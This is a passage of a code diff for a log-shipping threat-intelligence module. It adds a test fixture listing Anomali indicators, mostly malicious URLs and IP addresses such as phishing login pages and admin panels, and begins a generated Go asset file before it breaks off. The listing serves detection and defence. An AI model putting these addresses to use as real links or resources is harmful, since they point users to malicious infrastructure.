"indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:24.048Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "jumbajumbadun.fun", + "threatintel.indicator.url.original": "http://jumbajumbadun.fun/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 45890, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-58" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:55.816Z", + "threatintel.anomali.name": "mal_url: http://tavim.org/includes/salah/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tavim.org/includes/salah/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:55.816Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tavim.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://tavim.org/includes/salah/admin.php", + "threatintel.indicator.url.path": "/includes/salah/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 46491, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-80" + ], + "threatintel.anomali.modified": "2020-01-24T03:01:10.501Z", + "threatintel.anomali.name": "mal_url: http://l0c23205.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://l0c23205.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:01:10.501Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "l0c23205.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://l0c23205.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 47096, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T03:01:10.518Z", + "threatintel.anomali.name": "mal_url: http://l535e9e5.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://l535e9e5.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:01:10.518Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "l535e9e5.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://l535e9e5.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 47701, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-24T03:01:14.843Z", + "threatintel.anomali.name": "mal_ip: 217.8.117.47", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '217.8.117.47']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:01:14.843Z", + "threatintel.indicator.ip": "217.8.117.47", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 48229, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-67" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:12.699Z", + "threatintel.anomali.name": "mal_url: http://46.161.27.57/northon/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://46.161.27.57/northon/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:12.699Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "46.161.27.57", + "threatintel.indicator.url.original": "http://46.161.27.57/northon/", + "threatintel.indicator.url.path": "/northon/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 48824, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-90" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:28.034Z", + "threatintel.anomali.name": "mal_url: http://104.168.99.170/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://104.168.99.170/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:28.034Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "104.168.99.170", + "threatintel.indicator.url.original": "http://104.168.99.170/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 49397, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:38.187Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:38.187Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/scan/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/scan/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 50023, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-65" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:38.214Z", + "threatintel.anomali.name": "mal_url: http://f0391587.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0391587.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:38.214Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0391587.xsph.ru", + "threatintel.indicator.url.original": "http://f0391587.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 50638, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-67" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:47.281Z", + "threatintel.anomali.name": "mal_url: http://46.161.27.57:8080/northon/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://46.161.27.57:8080/northon/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:47.281Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "46.161.27.57", + "threatintel.indicator.url.original": "http://46.161.27.57:8080/northon/", + "threatintel.indicator.url.path": "/northon/", + "threatintel.indicator.url.port": 8080, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 51243, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-79" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:51.296Z", + "threatintel.anomali.name": "mal_url: http://f0393086.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0393086.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:51.296Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0393086.xsph.ru", + "threatintel.indicator.url.original": "http://f0393086.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 51858, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:56.007Z", + "threatintel.anomali.name": "mal_url: http://insuncos.com/files1/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://insuncos.com/files1/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:56.007Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "insuncos.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://insuncos.com/files1/panel/admin.php", + "threatintel.indicator.url.path": "/files1/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 52460, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:56.044Z", + "threatintel.anomali.name": "mal_url: http://tg-h.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tg-h.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:56.044Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tg-h.ru", + "threatintel.indicator.url.original": "http://tg-h.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 53022, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-86" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:11.038Z", + "threatintel.anomali.name": "mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:11.038Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "wusetwo.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 53740, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-64" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:20.420Z", + "threatintel.anomali.name": "mal_url: http://185.234.217.36/northon/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://185.234.217.36/northon/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:20.420Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "185.234.217.36", + "threatintel.indicator.url.original": "http://185.234.217.36/northon/", + "threatintel.indicator.url.path": "/northon/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 54330, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:20.448Z", + "threatintel.anomali.name": "mal_url: http://topik07.mcdir.ru/papka/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://topik07.mcdir.ru/papka/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:20.448Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "topik07.mcdir.ru", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://topik07.mcdir.ru/papka/admin.php", + "threatintel.indicator.url.path": "/papka/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 54924, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:33.189Z", + "threatintel.anomali.name": "mal_url: http://insuncos.com/files2/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://insuncos.com/files2/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:33.189Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "insuncos.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://insuncos.com/files2/panel/admin.php", + "threatintel.indicator.url.path": "/files2/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 55526, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-47" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:49.056Z", + "threatintel.anomali.name": "mal_url: http://185.234.218.68/kaspersky/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://185.234.218.68/kaspersky/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:49.056Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "185.234.218.68", + "threatintel.indicator.url.original": "http://185.234.218.68/kaspersky/", + "threatintel.indicator.url.path": "/kaspersky/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 56123, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:59.472Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:59.472Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/mh/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/mh/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 56745, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:27.070Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:27.070Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/ch/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/ch/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 57364, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:28.967Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:28.967Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/dar/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/dar/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 57988, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:37.661Z", + "threatintel.anomali.name": "mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:37.661Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "oaa-my.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/cage/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 58627, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-53" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:37.692Z", + "threatintel.anomali.name": "mal_ip: 192.64.118.56", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '192.64.118.56']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:37.692Z", + "threatintel.indicator.ip": "192.64.118.56", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 59173, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:54.296Z", + "threatintel.anomali.name": "mal_url: http://insuncos.com/files3/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://insuncos.com/files3/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:54.296Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "insuncos.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://insuncos.com/files3/panel/admin.php", + "threatintel.indicator.url.path": "/files3/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/fields.go b/x-pack/filebeat/module/threatintel/fields.go new file mode 100644 index 000000000000..7dce52402df1 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/fields.go @@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// Code generated by beats/dev-tools/cmd/asset/asset.go - DO NOT EDIT. + +package threatintel + +import ( + "github.com/elastic/beats/v7/libbeat/asset" +) + +func init() { + if err := asset.SetFields("filebeat", "threatintel", asset.ModuleFieldsPri, AssetThreatintel); err != nil { + panic(err) + } +} + +// AssetThreatintel returns asset data. +// This is the base64 encoded gzipped contents of module/threatintel. +func AssetThreatintel() string { + return 